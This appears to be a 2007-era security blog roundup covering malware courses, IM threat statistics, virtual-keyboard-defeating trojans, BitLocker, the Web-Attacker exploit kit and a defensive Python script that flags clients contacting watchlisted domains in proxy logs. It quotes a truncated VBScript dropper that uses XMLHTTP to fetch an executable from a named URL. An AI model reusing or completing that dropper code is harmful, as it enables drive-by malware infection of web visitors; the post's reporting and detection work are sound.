F-Secure is about to start a course called "Malware Analysis and
Antivirus Technologies" at the Helsinki University of Technology. I
really wish we had had classes like that when I was in college!
And since F-Secure is full of cool people, they provide the slides from the
lectures that have already been given!
"In this post we investigate the distribution of web server software to
provide insight into how server software is correlated to servers hosting
malware binaries or engaging in drive-by-downloads."
Their numbers differ slightly from Netcraft's, but they give a
fairly good explanation of why. According to Google, IIS and Apache account
for equal shares of the web servers distributing malware overall.
Interesting facts: in the US, 80% of malware is served by Apache; in China,
95% by IIS...
CastleCops.com is a popular site aimed at
providing information for computer security education. Their forums are
particularly useful when you think something fishy is going on; a lot of very
well-informed people participate there.
Recently a conversation about rogue domains used by the (nasty) Zlob
malware was posted, and the malware author came along and tried to explain that
his little creation wasn't malware and that they weren't doing anything bad.
No need to tell you the discussion literally went kaboom.
FaceTime
Security Labs, an IM-security-focused research lab, recently reported that
IM and P2P attacks were on the rise: a 5% increase in incidents targeting
public IM and P2P channels in Q2 2007 compared to Q1 2007. Just to compare,
over the same period in 2006 a 35% decrease was seen.
The SpywareGuide Greynets Blog summarizes:
From Q1 to Q2 2007, attacks spread via the mainstream networks (Yahoo, MSN
and AOL) dropped from 74 total incidents in the first period to 64 in the
second quarter. Attacks spread via AOL dropped by more than half (from 28
incidents to 13). Overall, the MSN network accounted for 50 percent of the
attacks on the major networks, followed by Yahoo at 30 percent and AOL with 20
percent.
As we predicted earlier this year, attacks spread via Internet Relay Chat
(IRC) continue to account for a growing percentage of all attacks. In fact, the
percentage of attacks that are IRC-based has risen in each of the last six
quarters, rising from a 59 percent share in Q1 2006 to 72 percent in the
current quarter.
Didier Stevens conducted a little experiment: what if he used
AdWords to tell people to visit his blog to get infected by malware? His ad
read “Is your PC virus-free? Get it infected here!” and it ran for 6
months. Of course, clicking on the link would not infect the visitor's computer,
but it could have. Guess how many people clicked? 409.
409 people wanted their computer infected? Well, I guess people don't read.
How many people use Google to surf thinking that AdWords ads are actual results
given by Google?
Ever heard of the cellphone cloning method? It's a way of transferring the
identity of one phone to another, generally for the purpose of making fraudulent
calls. It's fun because if you are located near the same transmission tower as
the cellphone you cloned, you'll get copies of text messages and calls made to
the original phone. You need to have access to the original cellphone and
clone the SIM, then upload the SIM data into your phone. No easy thing.
What about being able to get any unencrypted transmission made around your
cellphone directly on it?
Warezov, Spamthru... viruses used by spammers. They are pretty easy to detect
if you can monitor HTTP connections. Indeed, more and more viruses try to
fetch data (spam templates or updates) from dedicated domains. If you can
monitor those domains, you can detect infected computers on your
network.
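As an added illustration of that monitoring idea (this is example code written for this post, not anything from the Warezov/Spamthru analyses), the script below walks a Squid-style proxy access log, extracts the destination host of every GET or CONNECT, and reports which internal clients talked to a watchlist of "dedicated domains". The watchlist and the log lines are constructed placeholders (.test names), not real indicators. The matching deliberately requires an exact host or a true subdomain, so a look-alike such as notupdate.example-c2.test does not trigger on an update.example-c2.test entry.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed watchlist of domains a spam bot might poll for templates or
# updates. Placeholder names under .test, not real indicators of compromise.
WATCHLIST = frozenset({
    "templates.example-c2.test",
    "update.example-c2.test",
})

# Assumed Squid-style access log layout:
# <epoch> <elapsed_ms> <client_ip> <result/status> <bytes> <method> <url> ...
LOG_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)

# Constructed sample log: 10.0.0.12 fetches a template and an update,
# 10.0.0.7 is clean, 10.0.0.25 hits a look-alike domain (must not match)
# and then CONNECTs to a real subdomain of a watched host (must match).
SAMPLE_LOG = """\
1181234567.123 45 10.0.0.12 TCP_MISS/200 5120 GET http://templates.example-c2.test/tpl/7.txt - DIRECT/203.0.113.5 text/plain
1181234570.001 12 10.0.0.12 TCP_MISS/200 83000 GET http://update.example-c2.test/bin/upd.exe - DIRECT/203.0.113.5 application/octet-stream
1181234571.500 30 10.0.0.7 TCP_HIT/200 2048 GET http://www.example.org/index.html - NONE/- text/html
1181234580.250 40 10.0.0.25 TCP_MISS/200 900 GET http://notupdate.example-c2.test/ - DIRECT/203.0.113.9 text/html
1181234590.000 20 10.0.0.25 TCP_MISS/200 700 CONNECT x.templates.example-c2.test:443 - DIRECT/203.0.113.5 -
"""


def extract_host(url: str) -> str:
    """Return the lowercase hostname from a proxy-log URL field.

    CONNECT lines carry 'host:port' with no scheme, so they are split by hand.
    """
    if "://" in url:
        host = urlsplit(url).hostname or ""
    else:
        host = url.rsplit(":", 1)[0]
    return host.lower().rstrip(".")


def matches_watchlist(host: str, watchlist=WATCHLIST):
    """Return the matching watchlist entry for an exact host or a true
    subdomain of it, else None. The leading dot in the suffix test keeps
    'notupdate.x' from matching an entry 'update.x'."""
    for entry in watchlist:
        if host == entry or host.endswith("." + entry):
            return entry
    return None


def find_infected_hosts(log_text: str, watchlist=WATCHLIST):
    """Parse the log and return {client_ip: {matched_domain: hit_count}}
    for every client that contacted a watched domain."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        entry = matches_watchlist(extract_host(m.group("url")), watchlist)
        if entry:
            hits[m.group("client")][entry] += 1
    return {client: dict(domains) for client, domains in hits.items()}


if __name__ == "__main__":
    for client, domains in sorted(find_infected_hosts(SAMPLE_LOG).items()):
        print(f"{client}: {domains}")
```

The report keys on the client address rather than on the domain, because the thing an administrator acts on is the infected machine; a count per domain lets you tell a one-off lookup from a bot polling for templates every few minutes.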
According to a new research report produced by security software maker
Akonix Systems, in San Diego, experts at the company unearthed some 406 new
IM-borne threats over the last 12 months, compared with 347 attacks tracked by
the company in 2005.
In 2004 the company's security analysts discovered just under 50 attacks
that were carried out either via IM or peer-to-peer technologies.
However, attacks delivered via P2P networks appear to be falling in
popularity, as Akonix researchers recorded an 11 percent decrease in that type
of threat during December 2006, with only 16 such attacks reported for the
month. Akonix traditionally reports its research of IM and P2P threats
simultaneously.
An unknown hacker has infiltrated a massive University of California, Los
Angeles database with personal information on 800,000 people, the school said
on Tuesday, in one of the worst computer breaches ever at a U.S.
university.
More and more banking institutions are replacing the usual username/password
form with a virtual keyboard. The sole purpose of this method is to defeat
keyloggers.
Unfortunately for them, more and more malware also defeats the purpose of
using virtual keyboards. The guys at VirusTotal analyzed a
new trojan that performs a series of small screen captures of the area
around the mouse cursor. It also adds a red arrow pointing exactly where the
user clicked.
This is a very interesting lecture from Frédéric Raynal from
the French security mag MISC:
Cryptology is everywhere nowadays. Most of the time, people don't even know
they are actually using it on a daily basis. In this lecture, we'll show how
cryptography is actually a double-edged sword. Despite cryptology's common
use as a defensive way by providing primitives like confidentiality and
integrity, we'll see how to use cryptology for malicious purposes. We use it
here to improve target selection during attacks, to save time or to be as
stealthy as possible.
Vista's Enterprise and Ultimate editions will introduce a new (for Windows)
security feature called BitLocker:
BitLocker Drive Encryption is a data protection feature available in Windows
Vista Enterprise and Ultimate for client computers and in Windows Server
"Longhorn". BitLocker is Microsoft’s response to one of our top customer
requests: address the very real threats of data theft or exposure from lost,
stolen or inappropriately decommissioned PC hardware with a tightly integrated
solution in the Windows Operating System.
You can configure Vista to require a USB pen key or flash drive to boot.
If the user can't provide the right key, the data on the hard drive stays
encrypted and (relatively) secure.
Well, OK, it's not really AJAX. This malware uses a bit of HTML with VBScript
that uses XMLHttpRequest to fetch and download the actual executable. Add some
minor obfuscation to fool antiviruses and you get W32/new-malware!Maximus on
your hard drive:
<title></title>
<head></head>
<body>
<script language="VBScript">
on error resume next
' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"
' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
' (the listing ends here in the original post)
Websense analyzes Web-Attacker, the most popular toolkit for
building malicious sites. It's supposedly used by one third of the malicious
sites discovered:
Dear Friends! We would like to offer you multi-component exploit
Web-Attacker, that realizes vulnerabilities in the internet browsers Internet
Explorer and Mozilla Firefox. With the help of this exploit you will be able to
install any programs on the local disks of visitors of your web pages. In the
foundation of work of the exploit Web-Attacker, there are 7 already-known
vulnerabilities in the internet browsers.
Objective of the Exploit: Hidden drop of the executable from the deleted
source to the local hard drive of the site visitor.
It costs $300 and provides a few files to help you build your own malicious
site. Just supply malware, a keylogger or whatever else you want to infect your
visitors with.
Secure Science Corporation and Michael Ligh did a very good job analyzing a
malware sample. Their case study is a very complete and interesting analysis of
a yet-to-be-named malware (prg.exe):
This document contains details of an exploratory case study that was
conducted on a malware specimen found in the wild by members of the Mal-Aware
Group. The trojan was hosted on web servers located in the Ukraine and
Russia, and existed among several gigabytes of data encoded with a proprietary
algorithm. There were nearly 10,000 individual files available, each containing
between 70 bytes and 56 megabytes worth of stolen data that only criminals
could read…until now.
Looks like one of the Polish police's sites (http://www.elblag.policja.gov.pl) was defaced this week by a team
named "un-root". Zone-H has a mirror
of the defacement here.